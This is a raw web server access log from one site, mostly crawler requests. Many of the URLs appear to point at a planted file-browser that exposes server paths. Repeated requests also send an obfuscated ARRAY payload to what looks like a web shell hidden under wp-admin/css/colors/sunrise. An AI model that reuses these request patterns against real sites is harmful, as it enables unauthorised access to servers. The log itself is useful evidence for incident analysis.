20.171.207.35 - - [30/Oct/2025:05:28:38 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/language-chooser.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:28:42 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/custom-background.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:43 +1000] "GET /shopbrand/1874746625.shtm HTTP/1.1" 200 25825 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:28:47 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-widgets.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 13424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:28:51 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-widgets.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 13424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:53 +1000] "GET /shopbrand/1874725351.shtm HTTP/1.1" 200 25530 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:28:56 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-nav-menus.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 19365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:28:58 +1000] "GET /sitemap-child-2307.xml HTTP/1.1" 200 6862 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:29:02 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-widgets.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 13424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:29:02 +1000] "GET /shopbrand/1874748646.shtm HTTP/1.1" 200 25989 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:05:29:06 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393539362p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736353939362q3462613561316163623763383933353533633930323530343234653936303263222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:29:06 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-widgets.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 13424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:29:10 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3800 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:29:11 +1000] "GET /shopbrand/1874729454.shtm HTTP/1.1" 200 26053 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:29:14 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/custom-background.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:29:18 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/language-chooser.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:29:21 +1000] "GET /shopbrand/1874749355.shtm HTTP/1.1" 200 23810 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:29:22 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-controls.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 42321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:29:29 +1000] "GET /shopbrand/435148331.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:29:31 +1000] "GET /shopbrand/1874744575.shtm HTTP/1.1" 200 25117 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:29:33 +1000] "GET /shopbrand/542917414.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.55.39.11 - - [30/Oct/2025:05:29:35 +1000] "GET /shopbrand/2415264533.shtm HTTP/2.0" 200 23839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
212.16.195.25 - - [30/Oct/2025:05:29:37 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393632372p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363032372q3734363138666239343532336139386164613761386564623935323338636165222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:29:38 +1000] "GET /shopbrand/440991418.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:29:41 +1000] "GET /shopbrand/1874752071.shtm HTTP/1.1" 200 26521 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:29:42 +1000] "GET /shopbrand/440549463.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:29:46 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/se.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:29:49 +1000] "GET /sitemap-child-1706.xml HTTP/1.1" 200 6835 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:29:50 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/se.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:29:55 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/se.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:29:59 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/se.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:30:05 +1000] "GET /shopbrand/1874735739.shtm HTTP/1.1" 200 24387 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:30:06 +1000] "GET /shopbrand/440549463.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 10146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:30:07 +1000] "GET /shopbrand/1874756816.shtm HTTP/1.1" 200 27555 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:30:11 +1000] "GET /shopbrand/542917414.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:30:11 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393636312p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363036312q3931646236646263333838633064626563663938356635613430343439626333222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:30:14 +1000] "GET /shopbrand/440991418.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.129 - - [30/Oct/2025:05:30:15 +1000] "GET /shopbrand/1874732186.shtm HTTP/1.1" 200 25473 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:30:19 +1000] "GET /shopbrand/435148331.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.129 - - [30/Oct/2025:05:30:22 +1000] "GET /shopbrand/1874759034.shtm HTTP/1.1" 200 24692 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:30:23 +1000] "GET /shopbrand/440549463.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:30:28 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/class-wp-terms-list-table.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 10232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:30:30 +1000] "GET /shopbrand/1874741699.shtm HTTP/1.1" 200 25698 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:30:32 +1000] "GET /shopbrand/542917414.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4226 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:30:36 +1000] "GET /shopbrand/440991418.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:30:38 +1000] "GET /shopbrand/1874731632.shtm HTTP/1.1" 200 24900 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:30:40 +1000] "GET /shopbrand/435148331.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:30:44 +1000] "GET /shopbrand/440549463.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:30:49 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/l10n-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 3970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:30:49 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393639392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363039392q3666396330356138386230356239393838613035633137353739663163366332222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
35.178.52.85 - - [30/Oct/2025:05:30:50 +1000] "POST /wp-login.php HTTP/1.1" 200 61832 "-" "Mozilla/5.0"
20.171.207.35 - - [30/Oct/2025:05:30:53 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/export.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 11446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:30:55 +1000] "GET /shopbrand/1874745802.shtm HTTP/1.1" 200 24226 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:30:58 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/admin.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 4042 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:31:02 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/image.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 17063 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:31:02 +1000] "GET /shopbrand/1874750728.shtm HTTP/1.1" 200 24556 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:31:06 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/screen.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 5185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:31:10 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/menu.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 6285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:31:11 +1000] "GET /shopbrand/1874736269.shtm HTTP/1.1" 200 25549 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:31:16 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/noop.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 3505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:31:18 +1000] "GET /shopbrand/1874743893.shtm HTTP/1.1" 200 24334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:05:31:18 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313736393732382p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363132382q6665633962353330333263373263646561663839623566373761313432356634222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:31:20 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/file.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 34416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:31:21 +1000] "GET /shopbrand/1214837847.shtm HTTP/1.1" 200 27592 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:05:31:25 +1000] "GET /shopbrand/1874732879.shtm HTTP/1.1" 200 24600 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:31:26 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/ms.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 16523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:31:31 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/schema.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 15930 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:31:34 +1000] "GET /shopbrand/1874734380.shtm HTTP/1.1" 200 24425 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:31:36 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/misc.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 17876 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:31:42 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/theme.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 17571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:31:44 +1000] "GET /shopbrand/1874726194.shtm HTTP/1.1" 200 23844 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:31:47 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/import.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 5640 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:31:52 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes/media.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/includes HTTP/2.0" 200 41649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
